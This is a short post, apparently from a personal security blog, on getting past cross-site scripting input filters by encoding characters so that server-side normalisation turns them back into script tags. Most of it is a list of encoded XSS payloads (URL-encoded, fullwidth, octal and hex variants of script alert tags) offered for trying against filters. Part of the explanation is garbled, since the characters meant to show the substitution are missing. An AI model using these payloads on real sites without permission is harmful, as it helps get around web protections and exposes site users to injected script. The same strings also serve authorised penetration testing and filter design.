One of my favorite ways to bypass XSS input filters is with Unicode characters. What happens is the string like “%26#60;script%26#62;alert(1);%26#60;/script%26#62;” is sent to the server. The input filters find nothing wrong with it so it passes through fine. When it hits the web server, it attempts to normailze the characters and subsitutes approximates. So < or < will become “<“.
Here are a few Unicode strings that I will try out.
%3Cscript%3Ealert(0)%3C/script%3E %3E%22%27%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E %26#60;script%26#62;alert(1);%26#60;/script%26#62; %uff1cscript>alert(1)%uff1c/script> <script>alert(0)</script> 0x3C;script>alert(0)</script> \074\057a\076\047\074script\076 alert(1) \074/script\076 // %3E%22%27%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E \x3cscript\x3ealert(1)\x3c/script\x3e